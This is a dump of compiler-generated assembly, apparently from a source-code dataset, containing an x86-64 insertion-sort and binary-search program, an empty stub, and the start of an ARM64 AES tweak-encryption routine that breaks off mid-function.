cmpl -20(%rbp), %eax
setg %al
movb %al, -25(%rbp) ## 1-byte Spill
LBB1_5: ## in Loop: Header=BB1_3 Depth=2
movb -25(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_6
jmp LBB1_7
LBB1_6: ## in Loop: Header=BB1_3 Depth=2
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
movl -24(%rbp), %eax
subl $1, %eax
movl %eax, -24(%rbp)
jmp LBB1_3
LBB1_7: ## in Loop: Header=BB1_1 Depth=1
movl -20(%rbp), %edx
movq -8(%rbp), %rax
movl -24(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movl %edx, (%rax,%rcx,4)
## %bb.8: ## in Loop: Header=BB1_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB1_1
LBB1_9:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $128, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -100(%rbp)
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.3(%rip), %rdi
leaq -104(%rbp), %rsi
movb $0, %al
callq _scanf
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -112(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
movl -112(%rbp), %eax
cmpl -104(%rbp), %eax
jge LBB2_4
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movslq -112(%rbp), %rax
leaq -96(%rbp), %rsi
shlq $2, %rax
addq %rax, %rsi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB2_1 Depth=1
movl -112(%rbp), %eax
addl $1, %eax
movl %eax, -112(%rbp)
jmp LBB2_1
LBB2_4:
leaq -96(%rbp), %rdi
movl -104(%rbp), %esi
callq _insertionSort
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.3(%rip), %rdi
leaq -108(%rbp), %rsi
movb $0, %al
callq _scanf
leaq -96(%rbp), %rdi
movl -104(%rbp), %edx
subl $1, %edx
movl -108(%rbp), %ecx
xorl %esi, %esi
callq _BinarySearch
movl -100(%rbp), %eax
movl %eax, -116(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB2_6
## %bb.5:
movl -116(%rbp), %eax ## 4-byte Reload
addq $128, %rsp
popq %rbp
retq
LBB2_6:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "The position of the element in sorted array is: %d\n"
L_.str.1: ## @.str.1
.asciz "The element doesn't exist in the array\n"
L_.str.2: ## @.str.2
.asciz "Enter the size of the array: "
L_.str.3: ## @.str.3
.asciz "%d"
L_.str.4: ## @.str.4
.asciz "Enter the elements: "
L_.str.5: ## @.str.5
.asciz "Enter the element to search for: "
.subsections_via_symbols
| the_stack_data/42072.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/61075752.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _aesTweakEncrypt ; -- Begin function aesTweakEncrypt
.p2align 2
_aesTweakEncrypt: ; @aesTweakEncrypt
.cfi_startproc
; %bb.0:
sub sp, sp, #336
.cfi_def_cfa_offset 336
stp x28, x27, [sp, #304] ; 16-byte Folded Spill
stp x29, x30, [sp, #320] ; 16-byte Folded Spill
add x29, sp, #320
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str x0, [sp, #96]
str x1, [sp, #88]
str x2, [sp, #80]
str x3, [sp, #72]
ldr x1, [sp, #88]
add x0, sp, #120
bl _aesKeySetupEnc
ldr x8, [sp, #80]
ldrb w9, [x8]
ldr x8, [sp, #80]
ldrb w8, [x8, #1]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #104]
ldr x8, [sp, #80]
ldrb w9, [x8, #2]
ldr x8, [sp, #80]
ldrb w8, [x8, #3]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #108]
ldr x8, [sp, #80]
ldrb w9, [x8, #4]
ldr x8, [sp, #80]
ldrb w8, [x8, #5]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #112]
ldr x8, [sp, #80]
ldrb w9, [x8, #6]
ldr x8, [sp, #80]
ldrb w8, [x8, #7]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
str w8, [sp, #116]
ldr x8, [sp, #96]
ldrb w9, [x8]
ldr x8, [sp, #96]
ldrb w8, [x8, #1]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #96]
ldrb w9, [x9, #2]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #96]
ldrb w9, [x9, #3]
eor w8, w8, w9
ldr w9, [sp, #120]
eor w8, w8, w9
ldr w9, [sp, #104]
eor w8, w8, w9
str w8, [sp, #68]
ldr x8, [sp, #96]
ldrb w9, [x8, #4]
ldr x8, [sp, #96]
ldrb w8, [x8, #5]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #96]
ldrb w9, [x9, #6]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #96]
ldrb w9, [x9, #7]
eor w8, w8, w9
ldr w9, [sp, #124]
eor w8, w8, w9
ldr w9, [sp, #108]
eor w8, w8, w9
str w8, [sp, #64]
ldr x8, [sp, #96]
ldrb w9, [x8, #8]
ldr x8, [sp, #96]
ldrb w8, [x8, #9]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #96]
ldrb w9, [x9, #10]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #96]
ldrb w9, [x9, #11]
eor w8, w8, w9
ldr w9, [sp, #128]
eor w8, w8, w9
ldr w9, [sp, #112]
eor w8, w8, w9
str w8, [sp, #60]
ldr x8, [sp, #96]
ldrb w9, [x8, #12]
ldr x8, [sp, #96]
ldrb w8, [x8, #13]
lsl w8, w8, #16
eor w8, w8, w9, lsl #24
ldr x9, [sp, #96]
ldrb w9, [x9, #14]
eor w8, w8, w9, lsl #8
ldr x9, [sp, #96]
ldrb w9, [x9, #15]
eor w8, w8, w9
ldr w9, [sp, #132]
eor w8, w8, w9
ldr w9, [sp, #116]
eor w8, w8, w9
str w8, [sp, #56]
ldr w8, [sp, #68]
lsr w9, w8, #24
adrp x8, _Te0@PAGE
add x8, x8, _Te0@PAGEOFF
str x8, [sp] ; 8-byte Folded Spill
ldr w9, [x8, w9, uxtw #2]
ldr w10, [sp, #64]
lsr w10, w10, #16
and w10, w10, #0xff
adrp x11, _Te1@PAGE
add x11, x11, _Te1@PAGEOFF
str x11, [sp, #8] ; 8-byte Folded Spill
ldr w10, [x11, w10, uxtw #2]
eor w9, w9, w10
ldr w10, [sp, #60]
lsr w10, w10, #8
and w12, w10, #0xff
adrp x10, _Te2@PAGE
add x10, x10, _Te2@PAGEOFF
str x10, [sp, #16] ; 8-byte Folded Spill
ldr w12, [x10, w12, uxtw #2]
eor w12, w9, w12
ldrb w9, [sp, #56]
mov x13, x9
adrp x9, _Te3@PAGE
add x9, x9, _Te3@PAGEOFF
str x9, [sp, #24] ; 8-byte Folded Spill
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #136]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #52]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #140]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #48]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #144]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #44]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #148]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #40]
ldr w12, [sp, #52]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #48]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #44]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #40]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #152]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #48]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #44]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #40]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #52]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #156]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #44]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #40]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #52]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #48]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #160]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #40]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #52]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #48]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #44]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #164]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #168]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #52]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #172]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #48]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #176]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #44]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #180]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #40]
ldr w12, [sp, #52]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #48]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #44]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #40]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #184]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #48]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #44]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #40]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #52]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #188]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #44]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #40]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #52]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #48]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #192]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #40]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #52]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #48]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #44]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #196]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #200]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #52]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #204]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #48]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #208]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #44]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #212]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #40]
ldr w12, [sp, #52]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #48]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #44]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #40]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #216]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #48]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #44]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #40]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #52]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #220]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #44]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #40]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #52]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #48]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #224]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #40]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #52]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #48]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #44]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #228]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #232]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #52]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #236]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #48]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #240]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #44]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #244]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #40]
ldr w12, [sp, #52]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #48]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #44]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #40]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #248]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #48]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #44]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #40]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #52]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #252]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #44]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #40]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #52]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #48]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #256]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #40]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #52]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #48]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #44]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #260]
eor w12, w12, w13
ldr w13, [sp, #116]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #264]
eor w12, w12, w13
ldr w13, [sp, #104]
eor w12, w12, w13
str w12, [sp, #52]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #268]
eor w12, w12, w13
ldr w13, [sp, #108]
eor w12, w12, w13
str w12, [sp, #48]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #272]
eor w12, w12, w13
ldr w13, [sp, #112]
eor w12, w12, w13
str w12, [sp, #44]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w8, [x8, w12, uxtw #2]
ldr w12, [sp, #68]
lsr w12, w12, #16
and w12, w12, #0xff
ldr w11, [x11, w12, uxtw #2]
eor w8, w8, w11
ldr w11, [sp, #64]
lsr w11, w11, #8
and w11, w11, #0xff
ldr w10, [x10, w11, uxtw #2]
eor w8, w8, w10
ldrb w10, [sp, #60]
; kill: def $x10 killed $w10
